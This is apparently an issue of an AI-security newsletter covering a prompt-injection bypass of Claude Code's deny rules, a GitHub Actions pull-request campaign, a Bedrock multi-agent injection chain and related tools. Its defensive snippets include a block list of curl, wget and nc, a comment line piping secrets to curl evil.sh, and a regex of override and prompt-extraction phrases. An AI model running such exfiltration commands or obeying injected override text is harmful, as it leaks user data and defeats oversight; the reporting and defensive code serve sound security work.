Claude Code's Permission System Flipped by Prompt Injection
AI Sec News Weekly #3 — 221 sources scanned
There's a quiet assumption baked into most agent security models: if you define a deny rule, it stays denied. It's the same trust we place in firewalls, ACLs, and .gitignore — declarative boundaries that we write once and stop thinking about. But declarative controls only work when the enforcement layer can't be talked out of them.
That distinction matters more than ever as we hand agents real permissions over real systems. The gap between "policy as code" and "policy as suggestion" turns out to be exactly one well-crafted prompt wide. When your security boundary and your attack surface are both natural language, who's actually in charge?
Plenty to unpack this week — scroll on.
This Week's Stories
Claude Code Permission Bypass Lets Prompt Injection Flip Deny Rules to Ask
Days after Anthropic's accidental npm sourcemap leak (covered last issue), Adversa AI's red team found a critical flaw in Claude Code's permission system. The tool uses allow/deny/ask rules to gate shell commands, but deny rules can be bypassed: when a command exceeds 50 subcommand variants, the system falls back from 'deny' to 'ask' — and a prompt-injection payload in the same pipeline can get that ask prompt answered with approval. A crafted input can therefore escalate a hard-blocked command like curl into an approved one, opening the door to data exfiltration and arbitrary command execution.
Why it matters: The deny-to-ask fallback means Claude Code's permission model degrades silently under complexity — exactly the condition an attacker would engineer.
SecurityWeek by Kevin Townsend
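The deny-to-ask degradation is a reminder that hard blocks belong in code the model cannot negotiate with. A minimal sketch of that idea, where the deny decision is enforced out-of-band and cannot fall back to anything (the HARD_DENY set and allowed() helper are hypothetical, not Claude Code's actual mechanism):

```python
import shlex

# Hypothetical out-of-band guard: a deny decision enforced in plain code,
# so it cannot degrade to "ask" no matter how complex the command gets.
HARD_DENY = {"curl", "wget", "nc"}

def allowed(cmd: str) -> bool:
    """Return True only if no token resolves to a hard-denied binary."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        return False  # unparseable input fails closed
    # Deliberately coarse: a denied name anywhere in the command blocks the
    # whole line, including pipelines like `cat secrets | curl evil.sh`.
    return not any(tok.split("/")[-1] in HARD_DENY for tok in tokens)
```

The point of the sketch is the failure mode: a guard like this has exactly two outcomes, and neither one is "let's ask the model what it thinks".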
prt-scan Campaign Weaponizes GitHub Actions via AI-Generated Pull Requests
Security researchers traced a supply-chain campaign called prt-scan that abuses pull_request_target triggers in GitHub Actions to execute attacker-controlled code inside privileged CI workflows. Six sock-puppet accounts submitted AI-generated pull requests to public repos, and the operation ran for at least three weeks before anyone noticed. The campaign follows the earlier hackerbot-claw pattern but with tighter operational security and automated PR content, suggesting the technique is maturing fast.
Why it matters: AI-generated PRs that look plausible enough to trigger CI pipelines turn every repo with a pull_request_target workflow into an unintentional code-execution service for strangers.
X thread by Charlie Eriksen
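The core risky pattern in these campaigns is a pull_request_target trigger combined with a checkout of the PR's head ref, which hands privileged secrets to attacker-controlled code. A rough repo self-check, assuming naive text matching rather than full YAML parsing (risky_workflows is a hypothetical helper, not a tool from the campaign write-up):

```python
import re
from pathlib import Path

# Heuristic flags: a privileged trigger plus a checkout of PR-controlled code.
RISKY_TRIGGER = re.compile(r"^\s*pull_request_target\s*:", re.M)
PR_HEAD_CHECKOUT = re.compile(r"github\.event\.pull_request\.head\.(sha|ref)")

def risky_workflows(repo_root: str) -> list[str]:
    """List workflow files combining pull_request_target with a head checkout."""
    hits = []
    for wf in Path(repo_root).glob(".github/workflows/*.y*ml"):
        text = wf.read_text(errors="ignore")
        if RISKY_TRIGGER.search(text) and PR_HEAD_CHECKOUT.search(text):
            hits.append(str(wf))
    return hits
```

A text heuristic like this will miss indirection (reusable workflows, composite actions), so treat a clean result as "nothing obvious", not "safe".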
Unit 42 Maps Prompt Injection Attack Chains Through Bedrock Multi-Agent Systems
Palo Alto's Unit 42 published red-team research showing how an attacker can systematically compromise Amazon Bedrock multi-agent applications. The chain starts by fingerprinting the orchestration mode (Supervisor vs. Supervisor with Routing), then enumerating collaborator agents, then exfiltrating their system instructions and tool schemas, and finally invoking tools with attacker-supplied inputs. No vulnerability in Bedrock itself — the attacks exploit the inherent prompt-injection weakness in LLM-based inter-agent communication.
Why it matters: Multi-agent orchestration multiplies prompt-injection impact because a single poisoned message can traverse trust boundaries and reach tools the user-facing agent was never meant to expose.
Palo Alto Unit 42 by Jay Chen, Royce Lu
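One cheap mitigation layer the Unit 42 chain suggests is screening user-originated text before a supervisor relays it to collaborator agents. A hedged sketch (the PROBES list is illustrative, and keyword filters are easily evaded, so this is defense-in-depth at best, not a fix for the underlying weakness):

```python
import re

# Illustrative phrases matching the enumeration/exfiltration steps in the
# attack chain: agent discovery, system-prompt extraction, instruction override.
PROBES = [
    r"list (your|all) (tools|agents|collaborators)",
    r"(repeat|reveal|print) (your|the) (system|instructions?)",
    r"ignore (all )?previous instructions",
]
PATTERN = re.compile("|".join(PROBES), re.I)

def screen(message: str) -> bool:
    """Return True if the message looks like an enumeration or exfil probe."""
    return bool(PATTERN.search(message))
```

A screened message should be logged and dropped (or routed to a human), never "sanitized" and forwarded, since partial rewrites tend to leave working payload fragments behind.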
Tool Spotlight
New repos and releases worth trying.
AWS Security Agent Hits GA with Autonomous Multicloud Pen Testing
AWS moved its Security Agent — an autonomous, agentic AI pen-testing service — to general availability. It runs validated exploit chains (not just scan-and-flag) across AWS, Azure, GCP, and on-prem, compressing what typically takes weeks of manual testing into hours. HENNGE K.K., an early preview customer, reported a 90%+ reduction in testing duration and findings that manual testers had missed. The service deploys specialized AI agents that discover vulnerabilities, craft targeted payloads, and confirm exploitability without constant human oversight.
Why it matters: An always-on autonomous exploit engine with cross-cloud reach collapses the distinction between "scheduled pen test" and "continuous attack simulation" — which also means incident-response playbooks now need to account for friendly fire from your own vendor's agents.
agent-aegis 0.9.2 Adds Runtime Security to LangChain, CrewAI, and LLM APIs
A new Python package that monkey-patches LangChain, CrewAI, OpenAI, and Anthropic SDKs to inject runtime defenses — prompt-injection blocking, PII masking, action-policy enforcement, and audit logging — with a single import and zero application code changes. It's pre-1.0, the author is unknown, and documentation is sparse, so treat the registry entry and repo as the primary source of truth on what it actually hooks.
Why it matters: A middleware package sitting between your app and every LLM call is the single richest interception point an attacker could ask for — and this one has no track record yet.
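To see why such a package is so security-sensitive, it helps to sketch the monkey-patching pattern itself: one import swaps a method on the client class, and every subsequent call flows through the wrapper. The LLMClient class below is a stand-in, not agent-aegis's actual hook targets:

```python
import functools

audit_log: list[str] = []

class LLMClient:
    """Stand-in for any SDK client with a completion method."""
    def complete(self, prompt: str) -> str:
        return f"echo:{prompt}"

def install_hook(cls):
    """Replace cls.complete with a wrapper, as a middleware import would."""
    original = cls.complete
    @functools.wraps(original)
    def wrapped(self, prompt: str) -> str:
        audit_log.append(prompt)          # full visibility into every call
        if "BEGIN INJECTION" in prompt:   # ...and full power to rewrite it
            prompt = "[blocked]"
        return original(self, prompt)
    cls.complete = wrapped

install_hook(LLMClient)
```

The same mechanism that blocks an injection here could just as easily exfiltrate every prompt, which is exactly the trust question an unknown-author pre-1.0 package raises.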
ClawLock 2.1.0: Open-Source Red-Team and Hardening Toolkit for Claw Agents
ClawLock bills itself as a combined security scanner, red-team harness, and hardening toolkit purpose-built for Claw-based AI agent deployments. Version 2.1.0 landed on GitHub this week, though the repo page is light on details — no changelog, no list of supported checks, and no documentation on what "Claw-based" actually scopes to beyond the name.
Why it matters: Dual-use red-team toolkits with thin docs tend to get forked for offense long before defenders figure out the config flags.
Community Chatter
What practitioners are debating.
Simon Willison Tests Whether JS Can Escape CSP Meta Tags Inside Iframes
Willison ran extensive browser tests across Chromium and Firefox to see if JavaScript inside a sandbox="allow-scripts" iframe could defeat a <meta http-equiv="Content-Security-Policy"> tag. The answer: no. Removal, modification, and even navigating to a data: URI all failed — CSP policies set via meta tags are enforced at parse time and stick. The research came out of building his own Claude Artifacts clone and wanting to sandbox untrusted content without spinning up a separate origin.
Why it matters: Teams hosting AI-generated artifacts or agent output in iframes now have a tested, single-origin CSP strategy that doesn't require a throwaway domain.
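The pattern Willison validated can be reproduced in a few lines: untrusted markup goes into a sandboxed iframe via srcdoc, prefixed with a CSP meta tag that parse-time enforcement makes irremovable from inside. A sketch (the CSP policy string is an illustrative assumption, not his exact policy):

```python
import html

# Illustrative policy: no network fetches, inline scripts only.
CSP = "default-src 'none'; script-src 'unsafe-inline'"

def sandboxed_iframe(untrusted_html: str) -> str:
    """Wrap untrusted HTML in a sandboxed iframe with a leading CSP meta tag."""
    doc = (
        f'<meta http-equiv="Content-Security-Policy" content="{CSP}">'
        + untrusted_html
    )
    # srcdoc contents must be attribute-escaped; the browser unescapes
    # them before parsing the embedded document.
    return (
        '<iframe sandbox="allow-scripts" '
        f'srcdoc="{html.escape(doc, quote=True)}"></iframe>'
    )
```

Per his tests, script inside the frame cannot delete or loosen that meta tag after the fact, which is what makes this viable without a throwaway origin.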
Trail of Bits Open-Sources Its AI-Native Audit Playbook
Dan Guido laid out how Trail of Bits went from 5% internal buy-in to 94 plugins, 201 skills, 84 specialized agents, and AI-augmented auditors finding roughly 200 bugs per week on suitable engagements — all in about a year. The post, adapted from his [un]prompted conference talk, frames the journey in three tiers (AI-assisted → AI-augmented → AI-native) and open-sources most of the tooling. Guido explicitly contrasts this with the "hand out ChatGPT licenses and wait" approach that a recent NBER study of 6,000 executives found produced zero measurable productivity impact at 90% of firms.
Why it matters: A respected offensive shop publicly betting its audit methodology on agents sets a new baseline for what clients will expect from any security consultancy.
tl;dr sec by Clint Gibler
Quick Hits
- GPT-Researcher Has Unauthed Remote Code Injection Flaw (VulDB Recent) — CVE-2026-5631 is an unauthenticated code-injection bug in gpt-researcher's WebSocket endpoint with a public PoC exploit — no patch yet.
- ChatGPT Code Sandbox Leaked Data via DNS Queries (SecurityWeek) — Check Point found ChatGPT's code-execution sandbox could exfiltrate user data through outbound DNS queries; OpenAI says it's now patched.
- Claude Code Leak Exploited to Spread Infostealer Malware (BleepingComputer) — Attackers are using the Claude Code source-map leak to SEO-bait GitHub repos that deliver a Rust dropper installing Vidar infostealer and GhostSocks proxy malware.
- Google Releases Apache-Licensed Gemma 4 Model Family (Simon Willison) — Google DeepMind shipped Gemma 4 in four sizes (2B to 31B) under Apache 2.0 with vision and video support, runnable locally via GGUF for on-device red-teaming.
- DeepLoad Malware Uses AI-Generated Code to Dodge Scanners (Dark Reading) — ReliaQuest is tracking DeepLoad, a credential stealer that pads its PowerShell loader with likely AI-generated junk code to evade static analysis and spreads via USB.
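The DNS channel in the ChatGPT sandbox item above is detectable in principle because exfiltrated data tends to surface as long, high-entropy subdomain labels in outbound queries. A toy heuristic (thresholds are illustrative assumptions, not tuned values):

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character over the string's own distribution."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def looks_like_exfil(qname: str, max_label: int = 30,
                     min_entropy: float = 3.5) -> bool:
    """Flag query names with any label that is both long and high-entropy."""
    labels = qname.rstrip(".").split(".")
    return any(
        len(lb) > max_label and shannon_entropy(lb) > min_entropy
        for lb in labels
    )
```

Real detections would baseline per-domain query volume as well, since chunked exfiltration also shows up as bursts of unique subdomains against one zone.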